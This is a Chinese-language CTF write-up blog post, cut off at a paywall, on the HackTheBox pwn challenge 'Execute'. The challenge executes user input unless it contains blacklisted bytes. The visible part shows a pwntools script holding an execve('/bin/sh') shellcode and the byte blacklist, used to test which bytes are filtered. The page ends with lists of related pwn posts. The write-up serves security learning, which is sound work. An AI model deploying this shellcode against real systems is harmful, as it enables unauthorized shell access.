hackthebox-Pwn-Execute(ret2shellcode)

最新推荐文章于 2025-12-14 13:29:31 发布
最新推荐文章于 2025-12-14 13:29:31 发布
阅读量293 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: PWN67 文章标签: linux CTF 安全 pwn ret2shellcode 栈溢出 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/149689174
PWN67 专栏收录该内容
36 篇文章 ¥99.90 ¥299.90
订阅专栏

64 位程序,未开启 NX 保护

给了 C 源码:

不存在溢出,对输入的内容进行检测,如果输入内容在黑名单内直接退出,否则当做代码执行

检查一下 shellcode 中哪些字符被过滤了

只需制作基本的 shellcode,然后比较哪个字节与模式匹配

测试脚本:

from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = process("./pwn")

blacklist = b"\x3b\x54\x62\x69\x6e\x73\x68\xf6\xd2\xc0\x5f\xc9\x66\x6c\x61\x67"
        
shellcode = '''    
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov rax, 0x3b
syscall
'''

sc = asm(shellcode)
#如果有黑名
了解本专栏 订阅专栏 解锁全文
PWN-shellcode-WP- ()
qq_43390703的博客
03-29 1441
BITSCTF 2017-Command_Line、CSAW Quals CTF 2017-pilot、BSides San Francisco CTF 2017-b_64_b_tuff、 Openctf 2016-tyro_shellcode1比赛WP,从栈的结构、排列,汇编底层去分析理解,一步一步的解题过程,通俗易懂且详细
CTF-pwn pwntools用法探索
CoLin的pwn小屋
04-29 3374
pwntools的正确使用姿势
ctf-wiki基本ROP2-ret2shellcode学习笔记
m0_58824086的博客
09-03 769
shellcode的长度为44,而IDA告诉我们,s的首地址 = ebp - 64h,如果再加上ebp_of_caller本身的4字节则会有s的首地址 = &return_address - 68h。而vmmap告诉我们,地址在0x804a000~0x804b000的内容是可读、可写,因此bss段和data段也是可读、可写的。但这题非常特殊,IDA提供给我们的数据是错误的(一般情况下是正确的),当IDA和gdb计算偏移值有冲突时,应当以gdb为准。r(Read,读取):对文件而言,具有读取文件内容的权限;
CTF-PWN-web pwn初探
llovewuzhengzi的博客
08-12 1447
Webpwn目前大多数针对的是Php,我们需要重点分析的是 PHP 加载的外部拓展,漏洞点通常在 so拓展库中。由于 php加载扩展库来调用其内部函数,所以和常规 PWN题最大的不同点,就是我们不能直接获得交互式的shell。这里通常是需要采用 popen或者 exec函数族来进行执行 bash命令来反弹 shell,直接执行 one_gadget或者 system是不可行的。
ret2shellcode
m0_62280492的博客
07-07 1347
简单介绍常见的ret2shellcode
CTFshow-pwn入门-前置基础
akdelt的博客
01-15 913
esi 存储的是 msg 的地址,然后寄存器间接寻址把 msg 地址的内容拿出来给 eax 了。我们直接用 ida 看看 080490E8 地址上的值就行了。:运行此文件,将得到的字符串以ctfshow{xxxxx}提交。计算一下 eax 寄存器的值就行了(好臭的 flag,悲。所以我们把下载好的 elf 文件拿去执行即可。:寄存器间接寻址方式结束后eax寄存器的值为?: 立即寻址方式结束后eax寄存器的值为?:寄存器寻址方式结束后edx寄存器的值为?:直接寻址方式结束后ecx寄存器的值为?
栈溢出/ret2shellcode/ret2syscall/ret2libc
m0_63220798的博客
08-20 723
(仅作为本人的学习笔记和心得 如有错误请多指教)
ROP----The Solution For Ret2syscall
weixin_30631587的博客
06-05 666
APP:   https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2syscall/bamboofox-ret2syscall/rop TOOLS:   Gef plugin of gdb ROPgadget Solution: 1. Check the length ...
PWN——ret2libc
Pr0b1em的博客
12-08 526
ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system(“/bin/sh”),故而此时我们需要知道 system 函数的地址。
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 794
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
Linux + MySQL + Sysbench 一键部署和压测教程
soft2001525的博客
12-10 692
安装 Sysbench 并验证创建测试数据库sbtest和用户sbtest使用prepare构造数据表使用run进行各种类型压测使用cleanup清理数据分析每秒统计和最终汇总报告。
先立后破:Linux 下“新建管理员 → 验证 → 禁用 root 远程 SSH”的零翻车笔记
weixin_45626288的博客
12-12 486
本文提供了一套零风险的Linux服务器安全加固流程,重点解决等保2.0要求的"禁用root远程SSH"需求。通过"先立后破"原则,先创建并验证新管理员账号的sudo权限,再禁用root远程登录,全程保持root会话不断开作为应急通道。关键步骤包括:创建新管理员账号、配置sudo权限、严格测试新账号功能、安全修改sshd配置、保留本地root登录权限等。文章特别强调验证环节的重要性,并提供了快速回滚方案,确保运维人员不会因配置失误导致服务器失联。这套方法适用于Kylin
Linux 基础开发工具(2):gcc 、Makefile 与进度条程序实现
2501_92613722的博客
12-09 705
本文详细介绍了Linux下C/C++开发的核心工具链:首先解析gcc/g++编译器从预处理、编译、汇编到链接的完整编译流程;其次讲解Makefile的自动化构建原理与编写方法,包括单文件和多文件项目的构建规则;最后通过实现基础版和业务适配版两种进度条程序,演示了Linux终端程序的开发技巧。文章系统性地梳理了Linux开发环境搭建、项目构建和特色程序实现的全过程,为开发者提供了完整的入门指导方案。掌握这些基础技能后,开发者可快速开展Linux平台下的C/C++项目开发工作。
linux知识点-内核参数相关
gdpgdp_3的博客
12-11 328
sysctl --system 不指定文件情况默认加载from all system configuration files,如下。sysctl -p 默认(不指定文件情况下)加载 /etc/sysctl.conf 中所有的参数。sysctl --system 和sysctl -p的区别。
linux 系统中 Shutting Down, Restarting, Halting 有什么区别 ?
xiaochong0302的博客
12-12 306
Linux 提供了各种命令来执行不同类型的系统关闭。然而,用于指代这些关闭类型的术语可能会让人困惑,尤其是对 Linux 新用户来说。在本文中,我们将讨论关闭、重启和停止之间的区别,以及何时使用这些命令。
linux: gdb调试器
加油!
12-12 549
本文介绍了Linux命令行调试工具GDB的基本使用方法。首先说明了GDB在纯命令行环境中的重要性,并解释了core文件的作用及其配置方法。通过一个存在除零错误的示例代码,详细演示了GDB调试流程:包括编译时添加-g选项、设置断点、运行程序、单步执行(step/next)、查看变量(print/watch)、处理库函数跳转(finish)等核心操作。文章还对比了逐语句(s)和逐过程(n)的区别,并提供了常用调试命令速查表,如查看断点(infob)、删除断点(delete)、查看调用栈(bt)等。最后指出GDB
从ext4文件系统到Linux文件树
weixin_28673511的博客
12-12 711
Linux一切皆文件,Linux文件系统架构非常复杂,希望本文能够帮助你进一步了解Linux文件。
Linux----mmap
最新发布
w_z_j
12-14 472
mmap 是 Linux 虚拟内存机制的核心接口。它不仅支撑了文件映射、高性能 I/O,也支撑了线程栈、动态内存分配和共享内存。
Linux离线安装Docker最简单的方法
kingwz2012的专栏
12-09 388
观察输出,确认它是否针对你的系统架构(例如。# 3. 创建 systemd 服务文件。# 5. 配置 daemon.json。# 2. 复制二进制文件到系统目录。(64位Intel/AMD)或。# 6. 启动 Docker。,下载对应你系统架构(如。)的压缩包,重新安装。# 1. 解压二进制包。# 4. 创建配置目录。
Struts-Pwn工具:探测和利用Apache Struts CVE-2017-5638漏洞
struts-pwn工具要求使用Python 2或Python 3版本的Python解释器。在使用该工具时,应严格遵守法律和道德标准,仅在授权的情况下使用此工具进行安全测试和漏洞评估,不可用于非法攻击或入侵他人的计算机系统。 #### ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值